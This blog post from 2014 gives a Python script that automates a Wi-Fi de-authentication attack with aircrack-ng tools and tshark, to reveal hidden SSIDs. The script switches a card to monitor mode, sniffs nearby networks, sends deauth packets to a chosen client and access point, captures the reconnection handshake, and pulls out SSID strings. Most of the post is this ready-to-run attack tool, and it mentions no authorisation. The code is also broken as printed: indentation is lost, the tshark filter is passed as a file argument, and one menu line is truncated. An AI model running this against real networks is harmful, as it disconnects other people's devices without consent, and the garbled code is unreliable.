My code is bug free.: Python script : SSID sniffer, De-auth attack and Packets capturing using Aircrack-ng and tshark

September 9, 2014

Python script : SSID sniffer, De-auth attack and Packets capturing using Aircrack-ng and tshark

I was asked by my friend, Atikah to write some Python scripts for her final year project. The project involves discovering the hidden SSID of surrounding Wifi networks. Getting the non-hidden SSID is a matter of turning on the wireless card. For hidden SSID, the trick is to capture the authorization packets sent by the connected client to that Wifi network and get the SSID from the packet.

To do, we do "De-Auth attack" on that specific client. As a result, we disconnect it from the Wifi network. Once it's disconnected, it will try to reconnect to the Wifi network automatically by sending the "authorization" packets to that Wifi's Access Point.

We then capture these packets and analyse it for information.

#!/usr/bin/env python

import os
from time import sleep

print "1 - Put the wireless card to monitor mode."
print "2 - Sniff for surrounding wireless network and list all BSSIDs"
print "3 - Perform deAuth attack to a client from an AP"
print "4 - Capture packets into a file and examine it (if "
print " "
print "IMPORTANT NOTE: Press CNTRL+C to stop both the sniffing process and packets capture process"
sleep(5) #pause for 3 seconds so user can read the info

try:
os.system("airmon-ng start wlan0") #set wireless card to monitor mode
sleep(5) #pause for 5 seconds so user can read the info
print "wireless card is set to monitor mode. Start sniffing..."
os.system("airodump-ng mon0") #start probing local wireless network
except KeyboardInterrupt:
print "nothing";

print "Sniffing process stopped."
print "Lets start deAuth attack. Pick an AP and a connected client"
bssid = raw_input("Enter the MAC address of the hidden SSID of an AP (BSSID) : ")
station = raw_input("Enter the MAC address of connected client (STATION) : ")

try:
print "Start deAuth attack..."
os.system("aireplay-ng --deauth 10 -a %s -c %s mon0 --ignore-negative-one" % (bssid, station)) #send deAuth packets to the AP
except KeyboardInterrupt:
print "nothing";

print " "
print "deAuth attack is stopped. At this point, the client is trying to re-authenticate with the AP"
print "Lets capture the packets"
sleep(5) #pause for 3 seconds so user can read the info

try:
os.system("airodump-ng --bssid %s -w captured_packet mon0" %(bssid))
except KeyboardInterrupt:
print "nothing"

print "The captured packets are saved to a file in the same directory - captured_packet.cap"
print " "
print "Displaying the first 20 captured packets..."
os.system("tshark -r 'wlan.bssid == %s' -r captured_packet-01.cap | grep SSID | sed 's/^.*SSID=//' | sort | uniq" % bssid)
print "end"